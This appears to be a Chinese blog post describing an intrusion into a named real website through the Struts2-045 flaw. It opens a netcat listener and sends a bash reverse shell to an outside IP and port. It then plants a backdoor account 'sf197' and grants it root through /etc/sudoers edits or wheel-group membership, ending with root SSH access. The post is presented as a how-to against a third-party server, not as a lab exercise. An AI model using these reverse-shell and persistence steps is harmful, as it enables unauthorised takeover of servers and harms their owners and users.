前言、
提权这么久了 还是头一次提下Linux的服务器。。。
由于之前一直钻研的win服务器 要不是前些日子爆出来Struts2-045漏洞
估计还没时间接触Linux提权....
正文、
st2漏洞页面
http://www.dainar.com/index.action
可以看到是root权限的
接着就是想办法添加一个root组的用户
由于添加用户需要两次重复输入密码(不像win服务器直接net user)
所以nc反弹一个shell到外网服务器上
nc -vv -l -p 2333
在st2工具里输入
bash -i >& /dev/tcp/10.0.0.1/2333 0>&1
10.0.0.1是你的外网ip 2333是你监听的端口
然后执行反弹 成功反弹上来后
添加用户、
用adduser命令添加一个普通用户,命令如下:
#adduser sf197 //添加一个名为sf197的用户
#passwd sf197 //修改密码
Changing password for user sf197.
New UNIX password: //在这里输入新密码
Retype new UNIX password: //再次输入新密码
passwd: all authentication tokens updated successfully.//建立成功。
添加用户到root组、
方法一:修改 /etc/sudoers 文件,找到下面一行,把前面的注释(#)去掉
## Allows people in group wheel to run all commands
%wheel ALL=(ALL) ALL
然后修改用户,使其属于root组(wheel),命令如下:
#usermod -g root sf197
修改完毕,现在可以用sf197帐号登录,然后用命令 su - ,即可获得root权限进行操作。
方法二:修改 /etc/sudoers 文件,找到下面一行,在root下面添加一行,如下所示:
## Allow root to run any commands anywhere
root ALL=(ALL) ALL
sf197 ALL=(ALL) ALL
修改完毕,现在可以用sf197帐号登录,然后用命令 su - ,即可获得root权限进行操作。
成功添加完毕
用ssh协议连接服务器 执行id返回root组!
转载请注明本文作者:admin-神风